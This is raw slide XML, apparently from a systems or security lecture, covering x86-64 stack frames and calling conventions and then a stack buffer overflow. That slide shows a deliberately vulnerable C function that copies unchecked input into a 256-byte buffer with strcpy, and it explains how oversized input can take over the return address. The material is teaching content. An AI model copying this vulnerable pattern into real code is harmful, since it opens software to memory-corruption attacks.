              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void caller() { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int i, j;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  i = 42;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  callee(i, &amp;j);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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“leaq   a, b” moves the address of a into b.</a:t>
            </a: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“pushq a” implements our push, pushing a onto stack, “popq a” implements our pop, popping the stack into a.</a:t>
            </a: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“callq func” instruction is executed, it will push the 64-bit (8 byte) address of the next instruction onto the stack and jump to func.</a:t>
            </a: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“retq” pops return address and jumps to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30633911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58" y="143479"/>
            <a:ext cx="11885462" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack frames and calling conventions (Intel)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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FF45066-D795-5049-B397-ECAB502311F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175358" y="1680686"/>
            <a:ext cx="6042561" cy="3276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600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_callee:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    pushq   rbp          ; push old base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movq    rsp, rbp     ; stack is new base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movl    $1, rax      ; return value in rax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movl    rdi, -8(rbp) ; first arg to stk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movq    rsi, -16(rbp); second arg to stk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movl    -8(rbp), rdi ; a1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    addl    $1, rdi      ; a1 = a1 + 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movq    -16(rbp), rsi ; &amp;j to rsi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movl    rdi, (rsi)   ; *a2 = a1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    popq    rbp          ; restore base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    retq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7503C91-14C0-7D42-BAAD-BA02FE7D4938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016792" y="1702054"/>
            <a:ext cx="6254416" cy="29494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600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_caller: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    pushq   rbp         ; push old base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movq    rsp, rbp    ; cur stack is new base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    subq    $16, rsp    ; 16B of args (i,j)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    leaq    -8(rbp), rsi ; first arg (&amp;j)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movl    $42, -8(rbp) ; i = 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    movl    -8(rbp), rdi ; second arg (i)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    callq   _callee </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    addq    $16, rsp     ; remove area for args</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    popq    rbp          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    retq</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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5648327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43479"/>
            <a:ext cx="9700063" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack buffer example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300944" y="1428686"/>
            <a:ext cx="6330886" cy="4636448"/>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First “famous” use: Morris worm and fingerd.</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Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void vulnerable(char* in) {</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  char buf[256];</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  strcpy(buf, in);</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  subrouting1(buf);</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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What happens if size(in)&gt;256?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Scribble over return address, in and stack frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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When vulnerable returns, program which supplied input (in) controls return address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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Picture of stack frame after vulnerable is called is on right.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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB81613-3CDD-C143-B4F9-4B7B133140E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6701672" y="5214550"/>
            <a:ext cx="500458" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rsp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F271F373-90E0-1243-A517-158BED29F8C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7368937" y="5412256"/>
            <a:ext cx="45720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0939DD0-0F5B-CF48-8E9D-4340AA594425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028948" y="4325256"/>
            <a:ext cx="2508422" cy="108406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EDAE496-4DC4-DD46-A6EA-4BD549AE8B0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8335905" y="4521964"/>
            <a:ext cx="1861407" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buf[256]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D2195E-0076-DA40-9B4E-E87F3F86C5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8036202" y="3392692"/>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BB1CE8E-10CB-964F-9504-48F0EBC1A1B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11352919" y="3728960"/>
            <a:ext cx="0" cy="16702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1AA56B-5471-D441-A008-CE0CD688A7AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10614463" y="3001241"/>
            <a:ext cx="1817486" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>decreasing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184B1AB0-C7E4-8843-ADBE-37D2F9126DA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8462537" y="3402649"/>
            <a:ext cx="1503938" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0106224-4F84-D94B-8C3C-FD3478EB4026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8027961" y="3014536"/>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974C6D1-3499-C84E-BA73-82DED95E40FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448822" y="3036068"/>
            <a:ext cx="1771639" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702D667E-6194-2B4C-BCBF-F0B15CD4C671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8027962" y="2643829"/>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91F718E-7DED-5A4B-9CA1-99B35C469494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8535322" y="2665361"/>
            <a:ext cx="1705916" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input args (in)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C95F426-85C5-7247-B625-22E8E15C0043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807772" y="2464992"/>
            <a:ext cx="567784" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rbp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A8862A-D690-4947-9ED0-088EDD98F502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7475037" y="2662698"/>
            <a:ext cx="45720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3660850-0BBE-1641-BA54-C2610CE1798F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038127" y="3776186"/>
            <a:ext cx="2508422" cy="5549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833F3BB-6A65-9F46-B67F-BCD61310B023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
